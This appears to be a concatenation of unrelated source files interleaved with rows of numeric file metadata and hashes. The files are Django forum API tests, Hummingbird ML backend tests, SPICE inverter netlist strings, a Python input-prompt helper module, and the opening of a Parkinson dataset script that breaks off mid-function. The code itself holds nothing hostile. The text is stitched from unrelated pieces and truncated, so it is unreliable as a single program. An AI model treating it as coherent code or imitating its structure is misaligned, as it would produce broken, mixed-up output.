assert resp.data["title"] == "This is an updated title"
assert resp.data["text"] == "This is an updated text"
@pytest.mark.django_db
def test_update_thread_wrong_user(add_forum, add_user, add_thread, get_user_client):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
thread = add_thread(title='A thread in the General Forum', text='This is a new thread', forum=forum,
user=user)
user_two = add_user('user2', 'user2@email.com', 'testpass123')
client = get_user_client(user_two)
resp = client.put(
f"/api/threads/{thread.id}/",
json.dumps({"title": "This is an updated title", "text": "This is an updated text", "forum": forum.id,
"user": user_two.id}),
content_type="application/json"
)
assert resp.status_code == 403
@pytest.mark.django_db
def test_update_thread_incorrect_id(add_user, get_user_client):
user = add_user('user', 'user@email.com', 'testpass123')
client = get_user_client(user)
resp = client.put(f"/api/threads/99/")
assert resp.status_code == 404
@pytest.mark.django_db
def test_update_thread_invalid_json(add_forum, add_user, add_thread, get_user_client):
forum = add_forum(title="General Forum", description="This is a general forum")
user = add_user('user', 'user@email.com', 'testpass123')
thread = add_thread(title='A thread in the General Forum', text='This is a new thread', forum=forum,
user=user)
client = get_user_client(user)
resp = client.put(f"/api/threads/{thread.id}/", {}, content_type="application/json")
assert resp.status_code == 400
| 34.664384
| 112
| 0.660739
| 719
| 5,061
| 4.479833
| 0.100139
| 0.062093
| 0.056504
| 0.047501
| 0.933251
| 0.913691
| 0.913691
| 0.889475
| 0.834213
| 0.783297
| 0
| 0.016365
| 0.203122
| 5,061
| 145
| 113
| 34.903448
| 0.782296
| 0
| 0
| 0.644231
| 0
| 0
| 0.278008
| 0.029638
| 0
| 0
| 0
| 0
| 0.182692
| 1
| 0.076923
| false
| 0.086538
| 0.038462
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2d21068b53284e3677b50481e441176633992d77
| 17,179
|
py
|
Python
|
tests/test_backends.py
|
dkoutsou/hummingbird
|
cac18789dd284f7eadb3d24b7278610d34e90261
|
[
"MIT"
] | null | null | null |
tests/test_backends.py
|
dkoutsou/hummingbird
|
cac18789dd284f7eadb3d24b7278610d34e90261
|
[
"MIT"
] | null | null | null |
tests/test_backends.py
|
dkoutsou/hummingbird
|
cac18789dd284f7eadb3d24b7278610d34e90261
|
[
"MIT"
] | null | null | null |
"""
Tests Hummingbird's backends.
"""
import unittest
import warnings
import os
import shutil
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import OneHotEncoder
from onnxconverter_common.data_types import (
FloatTensorType,
DoubleTensorType,
Int64TensorType,
Int32TensorType,
StringTensorType,
)
import hummingbird.ml
from hummingbird.ml._utils import onnx_ml_tools_installed, onnx_runtime_installed, tvm_installed
from hummingbird.ml.exceptions import MissingBackend
if onnx_ml_tools_installed():
from onnxmltools.convert import convert_sklearn
class TestBackends(unittest.TestCase):
# Test backends are browsable
def test_backends(self):
warnings.filterwarnings("ignore")
self.assertTrue(len(hummingbird.ml.backends) > 0)
# Test backends are not case sensitive
def test_backends_case_sensitive(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "tOrCh")
self.assertIsNotNone(hb_model)
np.testing.assert_allclose(model.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
# Test pytorch is still a valid backend name
def test_backends_pytorch(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "pytOrCh")
self.assertIsNotNone(hb_model)
np.testing.assert_allclose(model.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
# Test pytorch save and load
def test_pytorch_save_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "torch")
self.assertIsNotNone(hb_model)
hb_model.save("pt-tmp")
hb_model_loaded = hummingbird.ml.TorchContainer.load("pt-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("pt-tmp.zip")
shutil.rmtree("pt-tmp")
# Test pytorch save and generic load
def test_pytorch_save_generic_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "torch")
self.assertIsNotNone(hb_model)
hb_model.save("pt-tmp")
hb_model_loaded = hummingbird.ml.load("pt-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("pt-tmp.zip")
shutil.rmtree("pt-tmp")
# Test torchscript save and load
def test_torchscript_save_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "torch.jit", X)
self.assertIsNotNone(hb_model)
hb_model.save("ts-tmp")
hb_model_loaded = hummingbird.ml.TorchContainer.load("ts-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("ts-tmp.zip")
shutil.rmtree("ts-tmp")
# Test torchscript save and generic load
def test_torchscript_save_generic_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "torch.jit", X)
self.assertIsNotNone(hb_model)
hb_model.save("ts-tmp")
hb_model_loaded = hummingbird.ml.load("ts-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("ts-tmp.zip")
shutil.rmtree("ts-tmp")
# Test not supported backends
def test_unsupported_backend(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Test scala backend rises an exception
self.assertRaises(MissingBackend, hummingbird.ml.convert, model, "scala")
# Test torchscript requires test_data
def test_torchscript_test_data(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Test torcscript requires test_input
self.assertRaises(RuntimeError, hummingbird.ml.convert, model, "torch.jit")
# Test TVM requires test_data
@unittest.skipIf(not tvm_installed(), reason="TVM test requires TVM installed")
def test_tvm_test_data(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Test tvm requires test_input
self.assertRaises(RuntimeError, hummingbird.ml.convert, model, "tvm")
# Test tvm save and load
@unittest.skipIf(not tvm_installed(), reason="TVM test requires TVM installed")
def test_tvm_save_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "tvm", X)
self.assertIsNotNone(hb_model)
hb_model.save("tvm-tmp")
hb_model_loaded = hummingbird.ml.TVMContainer.load("tvm-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("tvm-tmp.zip")
shutil.rmtree("tvm-tmp")
# Test tvm save and generic load
@unittest.skipIf(not tvm_installed(), reason="TVM test requires TVM installed")
def test_tvm_save_generic_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "tvm", X)
self.assertIsNotNone(hb_model)
hb_model.save("tvm-tmp")
hb_model_loaded = hummingbird.ml.load("tvm-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("tvm-tmp.zip")
shutil.rmtree("tvm-tmp")
# Test tvm save and load zip file
@unittest.skipIf(not tvm_installed(), reason="TVM test requires TVM installed")
def test_tvm_save_load_zip(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "tvm", X)
self.assertIsNotNone(hb_model)
hb_model.save("tvm-tmp.zip")
hb_model_loaded = hummingbird.ml.TVMContainer.load("tvm-tmp.zip")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("tvm-tmp.zip")
shutil.rmtree("tvm-tmp")
# Test onnx requires test_data or initial_types
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_no_test_data_float(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(
model, initial_types=[("input", FloatTensorType([X.shape[0], X.shape[1]]))], target_opset=11
)
# Test onnx requires no test_data
hb_model = hummingbird.ml.convert(onnx_ml_model, "onnx")
assert hb_model
# Test onnx 0 shape input
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_zero_shape_input(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(model, initial_types=[("input", DoubleTensorType([0, X.shape[1]]))], target_opset=11)
# Test onnx requires no test_data
hb_model = hummingbird.ml.convert(onnx_ml_model, "onnx")
assert hb_model
# Test onnx no test_data, double input
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_no_test_data_double(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(
model, initial_types=[("input", DoubleTensorType([X.shape[0], X.shape[1]]))], target_opset=11
)
# Test onnx requires no test_data
hb_model = hummingbird.ml.convert(onnx_ml_model, "onnx")
assert hb_model
# Test onnx no test_data, long input
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_no_test_data_long(self):
warnings.filterwarnings("ignore")
model = model = StandardScaler(with_mean=True, with_std=True)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.int64)
model.fit(X)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(
model, initial_types=[("input", Int64TensorType([X.shape[0], X.shape[1]]))], target_opset=11
)
# Test onnx requires no test_data
hb_model = hummingbird.ml.convert(onnx_ml_model, "onnx")
assert hb_model
# Test onnx no test_data, int input
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_no_test_data_int(self):
warnings.filterwarnings("ignore")
model = OneHotEncoder()
X = np.array([[1, 2, 3]], dtype=np.int32)
model.fit(X)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(
model, initial_types=[("input", Int32TensorType([X.shape[0], X.shape[1]]))], target_opset=11
)
# Test onnx requires no test_data
hb_model = hummingbird.ml.convert(onnx_ml_model, "onnx")
assert hb_model
# Test onnx no test_data, string input
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_no_test_data_string(self):
warnings.filterwarnings("ignore")
model = OneHotEncoder()
X = np.array([["a", "b", "c"]])
model.fit(X)
# Create ONNX-ML model
onnx_ml_model = convert_sklearn(
model, initial_types=[("input", StringTensorType([X.shape[0], X.shape[1]]))], target_opset=11
)
# Test backends are not case sensitive
self.assertRaises(RuntimeError, hummingbird.ml.convert, onnx_ml_model, "onnx")
# Test ONNX save and load
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_save_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "onnx", X)
self.assertIsNotNone(hb_model)
hb_model.save("onnx-tmp")
hb_model_loaded = hummingbird.ml.ONNXContainer.load("onnx-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("onnx-tmp.zip")
shutil.rmtree("onnx-tmp")
# Test ONNX save and generic load
@unittest.skipIf(
not (onnx_ml_tools_installed() and onnx_runtime_installed()), reason="ONNXML test require ONNX, ORT and ONNXMLTOOLS"
)
def test_onnx_save_generic_load(self):
warnings.filterwarnings("ignore")
max_depth = 10
num_classes = 2
model = GradientBoostingClassifier(n_estimators=10, max_depth=max_depth)
np.random.seed(0)
X = np.random.rand(100, 200)
X = np.array(X, dtype=np.float32)
y = np.random.randint(num_classes, size=100)
model.fit(X, y)
hb_model = hummingbird.ml.convert(model, "onnx", X)
self.assertIsNotNone(hb_model)
hb_model.save("onnx-tmp")
hb_model_loaded = hummingbird.ml.load("onnx-tmp")
np.testing.assert_allclose(hb_model_loaded.predict_proba(X), hb_model.predict_proba(X), rtol=1e-06, atol=1e-06)
os.remove("onnx-tmp.zip")
shutil.rmtree("onnx-tmp")
# Test for when the user forgets to add a target (ex: convert(model, output) rather than convert(model, 'torch')) due to API change
def test_forgotten_backend_string(self):
from sklearn.preprocessing import LabelEncoder
model = LabelEncoder()
data = np.array([1, 4, 5, 2, 0, 2], dtype=np.int32)
model.fit(data)
self.assertRaises(ValueError, hummingbird.ml.convert, model, [("input", Int32TensorType([6, 1]))])
if __name__ == "__main__":
unittest.main()
| 36.014675
| 135
| 0.655219
| 2,308
| 17,179
| 4.692808
| 0.075823
| 0.045241
| 0.026406
| 0.062044
| 0.860031
| 0.843689
| 0.825593
| 0.820423
| 0.817838
| 0.801588
| 0
| 0.031143
| 0.231795
| 17,179
| 476
| 136
| 36.090336
| 0.789573
| 0.074102
| 0
| 0.738372
| 0
| 0
| 0.065692
| 0
| 0
| 0
| 0
| 0
| 0.09593
| 1
| 0.063953
| false
| 0
| 0.040698
| 0
| 0.107558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
746b52aa123cffaae32e179b5e2267f99fc37608
| 4,782
|
py
|
Python
|
python/tests/netlist_example.py
|
thrile/cirkopt
|
b888d5ffa34033281acd58c45df1275425efb899
|
[
"MIT"
] | 1
|
2020-12-28T20:03:41.000Z
|
2020-12-28T20:03:41.000Z
|
python/tests/netlist_example.py
|
thrile/cirkopt
|
b888d5ffa34033281acd58c45df1275425efb899
|
[
"MIT"
] | 46
|
2020-11-01T22:26:01.000Z
|
2021-03-19T17:22:33.000Z
|
python/tests/netlist_example.py
|
thrile/cirkopt
|
b888d5ffa34033281acd58c45df1275425efb899
|
[
"MIT"
] | null | null | null |
TEST_NETLIST = r"""
** Library name: gsclib045
** Cell name: INVX1_3
** View name: schematic
.subckt INVX1_3 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=45e-9 W=250e-9 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=50e-9 W=300e-9 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=2
.ends INVX1_3
"""
NETLIST_F3E7F6B4_EXAMPLES = {
"INVX1_00": r"""** Library name: gsclib045
** Cell name: INVX1_00
** View name: schematic
.subckt INVX1_00 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=2e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=2e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_00
""",
"INVX1_01": r"""** Library name: gsclib045
** Cell name: INVX1_01
** View name: schematic
.subckt INVX1_01 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=3e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=3e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_01
""",
"INVX1_02": r"""** Library name: gsclib045
** Cell name: INVX1_02
** View name: schematic
.subckt INVX1_02 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=1.11e-06 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=1.35e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_02
""",
"INVX1_03": r"""** Library name: gsclib045
** Cell name: INVX1_03
** View name: schematic
.subckt INVX1_03 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=5e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=5e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_03
""",
"INVX1_04": r"""** Library name: gsclib045
** Cell name: INVX1_04
** View name: schematic
.subckt INVX1_04 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=6e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=6e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_04
""",
"INVX1_05": r"""** Library name: gsclib045
** Cell name: INVX1_05
** View name: schematic
.subckt INVX1_05 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=7e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=7e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_05
""",
"INVX1_06": r"""** Library name: gsclib045
** Cell name: INVX1_06
** View name: schematic
.subckt INVX1_06 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=8e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=8e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_06
""",
"INVX1_07": r"""** Library name: gsclib045
** Cell name: INVX1_07
** View name: schematic
.subckt INVX1_07 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=9e-07 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=9e-07 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_07
""",
"INVX1_08": r"""** Library name: gsclib045
** Cell name: INVX1_08
** View name: schematic
.subckt INVX1_08 A Y VDD VSS
*.PININFO VSS:I VDD:I A:I Y:O
** Above line required by Conformal LEC - DO NOT DELETE
mp0 Y A VDD VDD g45p1svt L=4.5e-08 W=1e-06 AD=54.6e-15 AS=54.6e-15 PD=1.06e-6 PS=1.06e-6 NRD=358.974e-3 NRS=358.974e-3 M=1
mn0 Y A VSS VSS g45n1svt L=4.5e-08 W=1e-06 AD=36.4e-15 AS=36.4e-15 PD=800e-9 PS=800e-9 NRD=538.462e-3 NRS=538.462e-3 M=1
.ends INVX1_08
""",
}
| 41.947368
| 125
| 0.685905
| 1,173
| 4,782
| 2.760443
| 0.069906
| 0.012353
| 0.03706
| 0.033354
| 0.941322
| 0.854849
| 0.854231
| 0.749228
| 0.738728
| 0.738728
| 0
| 0.255446
| 0.155165
| 4,782
| 113
| 126
| 42.318584
| 0.54604
| 0
| 0
| 0.378641
| 0
| 0.194175
| 0.956504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
746c39e04925a19e329f478a4ca258e7d72615f8
| 2,576
|
py
|
Python
|
utl/aqv/__init__.py
|
angellbelger/Police-Report-BO
|
658a3e14e371241ae7c9fa14c4ac3e1a31c1abd7
|
[
"MIT"
] | null | null | null |
utl/aqv/__init__.py
|
angellbelger/Police-Report-BO
|
658a3e14e371241ae7c9fa14c4ac3e1a31c1abd7
|
[
"MIT"
] | null | null | null |
utl/aqv/__init__.py
|
angellbelger/Police-Report-BO
|
658a3e14e371241ae7c9fa14c4ac3e1a31c1abd7
|
[
"MIT"
] | null | null | null |
from utl.lay import colour as cl
def readint(msg):
while True:
try:
x = int(input(msg))
except Exception as error:
print(f'{cl["r"]}{error.__class__}. Try again.{cl["limit"]}')
continue
else:
return x
def titleFor(txt, num1=0):
print(f'{cl["b"]}-' * num1)
print(f'{txt.center(num1)}')
print(f'-' * num1)
print(f'{cl["limit"]}')
def onlyBool(txt):
x = ''
while True:
try:
x = str(input(txt)).title()[0]
except Exception as error:
print(f'{cl["r"]}{error.__class__}. Try again.{cl["limit"]}')
else:
return x
def boolTitle(txt):
x = ''
bool = ''
while True:
try:
x = str(input(txt)).title().strip()
bool = str(input(f'It is correct: {cl["p"]}"{x}"{cl["limit"]} \nYour answer [ {cl["b"]}Y{cl["limit"]} | {cl["r"]}N{cl["limit"]} ]: '))[0].title()
if bool == 'N':
continue
elif bool not in 'NY':
print(f'{cl["r"]}Please, type a valid command.{cl["limit"]}')
else:
return x
except Exception as error:
print(f'{cl["r"]}{error.__class__}. Try again.{cl["limit"]}')
def bool(txt):
x = ''
bool = ''
while True:
try:
x = str(input(txt)).strip()
bool = str(input(f'It is correct: {cl["p"]}"{x}"{cl["limit"]} \nYour answer [ {cl["b"]}Y{cl["limit"]} | {cl["r"]}N{cl["limit"]} ]: '))[0].title()
if bool == 'N':
continue
elif bool not in 'NY':
print(f'{cl["r"]}Please, type a valid command.{cl["limit"]}')
else:
return x
except Exception as error:
print(f'{cl["r"]}{error.__class__}. Try again.{cl["limit"]}')
def boolNumber(txt):
while True:
try:
x = int(input(txt))
except Exception as error:
print(f'{cl["r"]}{error.__class__}. Try again.{cl["limit"]}')
continue
else:
bool = ''
bool = str(input(f'It is correct: {cl["p"]}"{x}"{cl["limit"]} \nYour answer [ {cl["b"]}Y{cl["limit"]} | {cl["r"]}N{cl["limit"]} ]: '))[0].title()
if bool not in 'NY':
print(f'{cl["r"]}Please, type a valid command.{cl["limit"]}')
elif bool == 'N':
continue
else:
return x
def line(x):
print('-' * x)
| 25.50495
| 157
| 0.443323
| 321
| 2,576
| 3.495327
| 0.186916
| 0.112299
| 0.071301
| 0.064171
| 0.835116
| 0.796791
| 0.759358
| 0.759358
| 0.729055
| 0.729055
| 0
| 0.005474
| 0.361801
| 2,576
| 101
| 158
| 25.504951
| 0.677007
| 0
| 0
| 0.722222
| 0
| 0.041667
| 0.308886
| 0.161816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0
| 0.013889
| 0
| 0.180556
| 0.180556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74a9cdcfca1e5479680e26f4ad39ce2a5f343903
| 7,343
|
py
|
Python
|
PythonMachineLearning/ParkinsonDataSet.py
|
bedirhansaglam/PythonMachineLearning
|
5364ad33698fe0ab0b79bd8bb3e60aea3a44e9e5
|
[
"MIT"
] | 1
|
2018-10-12T19:28:33.000Z
|
2018-10-12T19:28:33.000Z
|
PythonMachineLearning/ParkinsonDataSet.py
|
bedirhansaglam/PythonMachineLearning
|
5364ad33698fe0ab0b79bd8bb3e60aea3a44e9e5
|
[
"MIT"
] | null | null | null |
PythonMachineLearning/ParkinsonDataSet.py
|
bedirhansaglam/PythonMachineLearning
|
5364ad33698fe0ab0b79bd8bb3e60aea3a44e9e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 26 21:29:46 2017
@author: Bedirhan
"""
import os
import numpy as np
def saveData(filename,data):
